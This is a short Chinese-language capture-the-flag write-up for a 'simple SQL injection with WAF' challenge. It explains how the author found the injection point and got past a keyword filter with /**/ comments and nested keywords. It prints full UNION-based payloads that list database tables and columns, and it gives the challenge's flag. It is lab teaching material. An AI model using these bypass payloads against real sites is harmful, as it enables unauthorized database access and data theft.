2018-11-14 简单的SQL注入（带waf）

题目：简单的sql注入 分值：10

URL：http://www.shiyanbar.com/ctf/1875

解题思路：

输入1，显示了正常ID，输入1'，报错MYSQL，明显的SQL注入点。

直接尝试sqlmap，没有结果（或许应该尝试–tamper 参数，使用脚本过waf，或者抓个包试一下）。

输入1' and '1'='1 ,页面没有反应。手工输入1' and '1'='2,页面没有反应。说明存在某种waf。

简单的尝试后发现waf屏蔽了mysql关键字和关键字+空格的组合（例如:select+ 、union+ ）

尝试unionunion+ 的写法，顺利通过，后来百度了一下，知道可以用union/**/替代

解题步骤：

已知数据库类型为mysql，直接使用默认库爆表名，输入：

1'union/**/select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/'1'='1

发现flag表，爆丫列名，列名这里做了一些屏蔽，使用嵌套方式绕过，输入：

1'union/**/select/**/column_namcolumn_namee/**/from/**/information_scheminformation_schema.columnsa.columns/**/where/**/table_name='flag

爆出flag表的列名，查询flag列，输入：

1'union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

拿到flag（flag{Y0u_@r3_5O_dAmn_90Od}），10分到手。